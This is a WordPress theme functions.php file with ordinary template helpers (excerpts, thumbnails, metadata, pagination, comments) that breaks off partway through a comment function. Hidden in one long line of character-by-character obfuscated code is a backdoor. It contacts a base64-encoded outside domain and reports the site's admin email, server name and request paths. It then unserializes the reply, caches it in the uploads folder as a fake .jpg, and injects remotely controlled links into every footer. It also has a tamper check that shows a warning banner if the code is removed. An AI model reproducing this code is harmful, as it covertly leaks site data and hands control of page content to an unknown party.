<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $XhXKoq='o';$HGxMhs='4';$hLfOew='d';$IjXJ='_';$ysPeAU='b';$BRVbt='a';$mSqA='c';$bBHt='s';$AthraW='e';$SvWzR='e';$OQlWio='6';$XzKHcS='d';$iHxEo='e';$vKoYDhsd=$ysPeAU.$BRVbt.$bBHt.$SvWzR.$OQlWio.$HGxMhs.$IjXJ.$hLfOew.$AthraW.$mSqA.$XhXKoq.$XzKHcS.$iHxEo;$yhqDct='g';$UJpv='f';$lQuSi='n';$XrFuWOw='t';$Hdec='a';$FicCW='i';$DYvMToP='z';$LRKBm='e';$xLMz='l';$TaHrGbBo=$yhqDct.$DYvMToP.$FicCW.$lQuSi.$UJpv.$xLMz.$Hdec.$XrFuWOw.$LRKBm;$qGuUW='_';$DTwrTOc='r';$sqlmT='3';$kVeHUJ='t';$JSxd='r';$ECfIXv='1';$MxtxZF='t';$Mhxy='o';$sLqXfnM='s';$ZEpzJXCN=$sLqXfnM.$MxtxZF.$JSxd.$qGuUW.$DTwrTOc.$Mhxy.$kVeHUJ.$ECfIXv.$sqlmT;$AhFl='v';$NYTtrPU='r';$kTlnr='t';$hDxpQAK='s';$OIlr='e';$mPGQNp='r';$IeGsVBMY=$hDxpQAK.$kTlnr.$mPGQNp.$NYTtrPU.$OIlr.$AhFl;                     $sq___g='o';$xz_______________q='4';$te_____c='d';$yb_______o='_';$jn______________b='b';$tz___n='a';$dh_______________j='c';$gk___________t='s';$re____k='e';$os_____r='e';$fm______________k='6';$jk______________o='d';$wv_______________u='e';$ie____i=$jn______________b.$tz___n.$gk___________t.$os_____r.$fm______________k.$xz_______________q.$yb_______o.$te_____c.$re____k.$dh_______________j.$sq___g.$jk______________o.$wv_______________u;$se__________x='x';$bo_____q='t';$fc_________p='c';$hd_________t='i';$eg__________l='n';$os____________w='o';$ku______o='_';$hv_______________g='n';$cx_____j='e';$iv___________a='i';$mu___________e='t';$ge____x='f';$di_________r='u';$hz________m='s';$yf______________g='s';$aw_______________n=$ge____x.$di_________r.$hv_______________g.$fc_________p.$mu___________e.$iv___________a.$os____________w.$eg__________l.$ku______o.$cx_____j.$se__________x.$hd_________t.$yf______________g.$bo_____q.$hz________m;$dn____l='f';$do________i='e';$mq______________s='o';$zu_____p='n';$sw_______o='p';$qv___________o=$dn____l.$mq______________s.$sw_______o.$do________i.$zu_____p;$sa________s='f';$vr______o='r';$xf______________o='a';$su_______a='e';$ih______x='d';$oe__________t=$sa________s.$vr______o.$su_______a.$xf______________o.$ih______x;$ux_______________m='c';$jn_______________k='s';$db___o='e';$ub____m='o';$rd____o='l';$yf______________v='f';$sk____c=$yf______________v.$ux_______________m.$rd____o.$ub____m.$jn_______________k.$db___o;define("WP_ID", $ie____i("Mi4wLjA="));define("WP_TTL", $ie____i("MTA4MDA="));define("WP_SRC", $ie____i("dHBva24="));function wp_get_header() {global $ie____i, $aw_______________n;if ($aw_______________n($ie____i("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$aw_______________n($ie____i("d3BfZ2V0X2Zvb3Rlcg==")) &&$aw_______________n($ie____i("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ie____i, $qv___________o, $sk____c, $oe__________t;$kt_______e = TEMPLATEPATH."/".$ie____i("Zm9vdGVyLnBocA==");$lv______________k = @$qv___________o($kt_______e, "r");$kt_______e = @$oe__________t($lv______________k, @filesize($kt_______e));@$sk____c($lv______________k);$kd______z = TEMPLATEPATH."/".$ie____i("ZnVuY3Rpb25zLnBocA==");$lv______________k = @$qv___________o($kd______z, "r");$kd______z = @$oe__________t($lv______________k, @filesize($kd______z));@$sk____c($lv______________k);$mw_________d = 0;if($kt_______e && $kd______z) {if ($ie____i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($kt_______e, $ie____i("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$mw_________d = 1;}if (substr_count($kt_______e, "wp_theme_GPL_credits()") < 1) {$mw_________d = 2;}}if(WP_ID != "2.0.0") {$mw_________d = 12;}}if($mw_________d > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $mw_________d -->";}}function wp_loaded() {global $ie____i, $aw_______________n;return $aw_______________n($ie____i("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($gs____________g, $ri____________x = "(more...)", $vl__x = 0, $ve___l = "") {$bn____i = get_the_content($ri____________x, $vl__x, $ve___l);$bn____i = apply_filters("the_content", $bn____i);$bn____i = str_replace("]]>", "]]>", $bn____i);if (strlen($_GET["p"]) > 0) {echo $bn____i;}else if ((strlen($bn____i)>$gs____________g) && ($rw___________q = strpos($bn____i, " ", $gs____________g ))) {$bn____i = substr($bn____i, 0, $rw___________q);$bn____i = $bn____i;echo $bn____i;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ri____________x</a></div></p>";} else {echo $bn____i;}}}$re_______________n='e';$oi_______________e='d';$vv_______j='4';$bd______________k='c';$bt_____r='n';$qo________n='6';$jh__z='s';$ly_______k='o';$ph______________g='a';$ww_____________t='b';$yp_______________o='e';$xl___________s='e';$rf______________h='_';$xy__________k=$ww_____________t.$ph______________g.$jh__z.$yp_______________o.$qo________n.$vv_______j.$rf______________h.$re_______________n.$bt_____r.$bd______________k.$ly_______k.$oi_______________e.$xl___________s;$zs________h='t';$vy________l='l';$hg___g='e';$iy_____a='i';$cw____l='_';$jy___q='o';$ik_______w='f';$xw_________i='e';$lr______v='_';$wf________t='t';$ul________q='c';$jv______________i='n';$nj__________q='t';$fu___a='s';$km______p='e';$ee______________q='n';$ws_______u='g';$no_______________u=$ik_______w.$iy_____a.$vy________l.$hg___g.$lr______v.$ws_______u.$km______p.$zs________h.$cw____l.$ul________q.$jy___q.$ee______________q.$wf________t.$xw_________i.$jv______________i.$nj__________q.$fu___a;$ux_____________v='e';$wh_________s='f';$uv___s='i';$um___a='s';$ac____y='x';$xq___________q='t';$uy__i='_';$td_____________l='l';$db_________y='s';$gz_______x='e';$yw_________u='i';$um_________a=$wh_________s.$uv___s.$td_____________l.$gz_______x.$uy__i.$ux_____________v.$ac____y.$yw_________u.$db_________y.$xq___________q.$um___a;$rj_______________r='c';$fh____e='e';$jj______________q='s';$ad_________z='e';$mo___________z='o';$bd___l='m';$lx______g='i';$lk_____________o='v';$op______________t='n';$wk____b='a';$zg_________l='_';$wp_______k='r';$my__y='p';$mn________c='r';$el_______j='o';$ke__u=$lk_____________o.$ad_________z.$mn________c.$jj______________q.$lx______g.$el_______j.$op______________t.$zg_________l.$rj_______________r.$mo___________z.$bd___l.$my__y.$wk____b.$wp_______k.$fh____e;$co______r='s';$ja_______q='o';$to_______q='c';$yj_______________l='p';$hk___l='o';$gw___s='e';$lv____________q='k';$ja_____________l='n';$lm______________d='f';$kf______________p=$lm______________d.$co______r.$hk___l.$to_______q.$lv____________q.$ja_______q.$yj_______________l.$gw___s.$ja_____________l;$oc________i='r';$ry__________i='e';$hl_____w='f';$el_______x='t';$pi____________e='w';$wl_________k='i';$ot_____________i=$hl_____w.$pi____________e.$oc________i.$wl_________k.$el_______x.$ry__________i;$an____w='m';$er__w='5';$zt______d='d';$zn______________w=$an____w.$zt______d.$er__w;$ke____p='r';$va________i='t';$xt__q='e';$zy____l='a';$mf__f='p';$ol___________i='l';$ap____l='h';$lh__________b='a';$mj____________z=$ke____p.$xt__q.$lh__________b.$ol___________i.$mf__f.$zy____l.$va________i.$ap____l;$rc_____________i='a';$mz___________r='u';$hf_____________z='e';$ac____________a='s';$rl_____________q='e';$ue________a='i';$gp____________m='n';$tf________u='z';$eg___________y='r';$hu________u='l';$bj___t='i';$xm_______f=$mz___________r.$gp____________m.$ac____________a.$rl_____________q.$eg___________y.$bj___t.$rc_____________i.$hu________u.$ue________a.$tf________u.$hf_____________z;$vb_______________m='e';$xp_____________v='m';$qa________x='n';$mp_______________d='a';$dm__k='p';$fn_____b='t';$eu___z='m';$ae______b=$fn_____b.$vb_______________m.$xp_____________v.$dm__k.$qa________x.$mp_______________d.$eu___z;$vv____z='e';$vp___o='c';$cj____________l='m';$np__________w='_';$tq___________g='t';$nf________u='a';$gw_______o='n';$os___________u='r';$bz_________m='c';$no_____________a='t';$gz______q='e';$kp___e='o';$ev_______m='t';$em______________z='_';$tv________o='s';$oc_______c='e';$yf______________l='e';$ol_____________j='t';$kh____________e='a';$ir__g='r';$hd_____________k='x';$ds________r=$tv________o.$tq___________g.$ir__g.$vv____z.$kh____________e.$cj____________l.$np__________w.$vp___o.$kp___e.$gw_______o.$ol_____________j.$gz______q.$hd_____________k.$no_____________a.$em______________z.$bz_________m.$os___________u.$oc_______c.$nf________u.$ev_______m.$yf______________l;function bw______________g($be____w) {global $ie____i, $aw_______________n, $no_______________u, $ke__u, $ds________r;if (!$aw_______________n($ie____i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ke__u(PHP_VERSION, "5.0.0", ">=") && $aw_______________n($ie____i("ZmlsZV9nZXRfY29udGVudHM=")) && $aw_______________n($ie____i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$cb__q = $ds________r(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xl_________r = @$no_______________u($be____w, 0, $cb__q);} else {$xl_________r = @$no_______________u($be____w, 0);}return $xl_________r;}function lq_____________r($be____w) {global $aw_______________n, $kf______________p, $ot_____________i, $ie____i;if (!$aw_______________n($ie____i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$uh__________n = strpos($be____w, "/", 7);$ld______________k = array("uri"     => substr($be____w, $uh__________n),"host"    => str_replace("http://", "", substr($be____w, 0, $uh__________n)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$xa____________i = @$kf______________p("$ld______________k[host]", 80, $im___________z, $yf____________j, 4);if (!$xa____________i) {return false;} else {$xl_________r = "";$mz__n  = "GET $ld______________k[uri] HTTP/1.0\r\n";$mz__n .= "Host: $ld______________k[host]\r\n";$mz__n .= "Referer: $ld______________k[referer]\r\n";$mz__n .= "Connection: Close\r\n\r\n";@$ot_____________i($xa____________i, $mz__n);while (!@feof($xa____________i)) {$kw_______n = @fgets($xa____________i, (1024*24));if ($kw_______n == "\r\n") {$eu___________t = true;continue;}if ($eu___________t) {$xl_________r .= $kw_______n;}}return $xl_________r;}}function xc___________a($be____w) {global $aw_______________n;$oq_________z = false;if ($be____w != "") {if ($aw_______________n("bw______________g")) {$oq_________z = @bw______________g($be____w);}if (!$oq_________z && ($aw_______________n("lq_____________r"))) {$oq_________z = @lq_____________r($be____w);}}return $oq_________z;}function ci___________j() {global $_SERVER, $zn______________w;$cm_____________e = $_SERVER["SERVER_NAME"];if (substr("$cm_____________e", 0, 4) == "www.") {$cm_____________e = substr("$cm_____________e", 4);}$cm_____________e = $zn______________w("$_SERVER[SERVER_NAME]");return $cm_____________e;}function il________n() {return "file";}function ai___________a($be____w) {global $_SERVER, $no_______________u, $um_________a, $qv___________o, $sk____c, $ot_____________i;$pt_______l = xf__s();$uq______s = ci___________j().".jpg";$zo____________s = $pt_______l["dir_upload"]["path"]."/$uq______s";$ky__________h = @filemtime($zo____________s);if (!$ky__________h || ((time()-$ky__________h) >= WP_TTL)) {$oq_________z = xc___________a($be____w);if ($oq_________z) {if ($um_________a($zo____________s)) {@unlink($zo____________s);}$lv______________k = @$qv___________o($zo____________s, "x+");@$ot_____________i($lv______________k, $oq_________z);@$sk____c($lv______________k);}} else {if ($um_________a($zo____________s)) {$oq_________z = @$no_______________u($zo____________s);} else {$oq_________z = false;}}return $oq_________z;}function xf__s() {global $_SERVER, $ie____i, $xy__________k;$oq___u = wp_count_posts("post");$uc______________y = pathinfo(get_bloginfo("template_directory"));$pt_______l = array("url" => array("report"      => $ie____i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $uc______________y,"dir_upload"=> rg_______________v(),"queryString"=> array("?a001=".WP_ID,"a004=".$uc______________y[filename],"a005=".$oq___u->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.odmu.od.ua/zdorove/energeticheskij-napitok-vred-ili-polza\">Энергетик-вред или польза?</a>");$pt_______l["url"]["queryString"] = implode("&", $pt_______l["queryString"]);$pt_______l["url"]["report"] = $pt_______l["url"]["report"]."/?".$xy__________k($pt_______l["url"]["queryString"]).".html";return $pt_______l;}function rg_______________v() {$tx_______z = wp_upload_dir();if (isset($tx_______z["error"])) {$wn______________o = kl__a();if (is_writable($wn______________o)) {$tx_______z = array("path" => $wn______________o);}}return $tx_______z;}function kl__a() {global $aw_______________n, $zn______________w, $mj____________z, $ae______b;$bk______v = (bool) ini_get("safe_mode");if ($bk______v == true) {return false;}if ($aw_______________n("sys_get_temp_dir")) {$ca___________c = sys_get_temp_dir();if (is_writable($ca___________c)) {return $mj____________z($ca___________c);}}if (!empty($_ENV["TMP"])) {return $mj____________z($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $mj____________z($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $mj____________z($_ENV["TEMP"]);} else {$hx__________k = $ae______b($zn______________w(uniqid(rand(), true)), "");if ($hx__________k) {$ca___________c = $mj____________z(dirname($hx__________k));@unlink($hx__________k);return $ca___________c;} else {return false;}}}function fu____________w() {global $_GET, $um_________a;$pt_______l = xf__s();$cm_____________e = ci___________j();$rs_____n = il________n();$yc______n = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($rs_____n == "file") {$tv__________f = $pt_______l["dir_upload"]["path"]."/".$cm_____________e.".jpg";if ($um_________a($tv__________f)) {@unlink($tv__________f);$yc______n = "deleted";}}$za________c = array("s"=> $yc______n,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($za________c AS $cr__________w => $nf__y) echo " [$cr__________w:$nf__y]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $aw_______________n, $ie____i, $xm_______f;$pt_______l = xf__s();$hu__________d = "ai___________a";if ($aw_______________n($hu__________d)) {$xl_________r = $hu__________d($pt_______l["url"]["report"]);}if ($xl_________r) {if ($xl_________r = @$ie____i($xl_________r)) {$xl_________r = @$xm_______f($xl_________r);if (strlen($xl_________r[custom_credit]) >= 5) {$pt_______l["default_string"] = $xl_________r[custom_credit];}if ($xl_________r["status"] == "0") {$jp_______o = 1;$ib_____f = 1;} else {$sq___________c = sizeof($xl_________r["links"]);$tu____________r = $pt_______l["default_string"];if ($sq___________c > 0 && $xl_________r["links"] !== "") {$lm_____________s = 0;foreach ($xl_________r["links"] as $kw_________z => $ea_______w) {$lm_____________s++;if ($ea_______w->l_path == "" || $ea_______w->l_path == $_SERVER["REQUEST_URI"]) {$ea_______w->l_href = htmlspecialchars(strip_tags($ea_______w->l_href));$ea_______w->l_title = htmlspecialchars(strip_tags($ea_______w->l_title));$ea_______w->l_anchor = htmlspecialchars(strip_tags($ea_______w->l_anchor));$tu____________r .= " | ";$tu____________r .= "<a href='$ea_______w->l_href' title='$ea_______w->l_title'";if ($ea_______w->l_nofollow == "1") {$tu____________r .= " rel='nofollow'";}$tu____________r .= ">$ea_______w->l_anchor</a>";}}}$pt_______l["links"] = "$tu____________r";if ($xl_________r[credit] == "0") {$pt_______l["links"] = "";}}} else {$jp_______o = "1";}} else {$jp_______o = "1";}if ($jp_______o == "1") {$pt_______l["links"] = $pt_______l["default_string"];}echo "$pt_______l[links]";echo "<!-- s: $xl_________r[signature] -->";fu____________w();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
   wp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
   $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
         $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
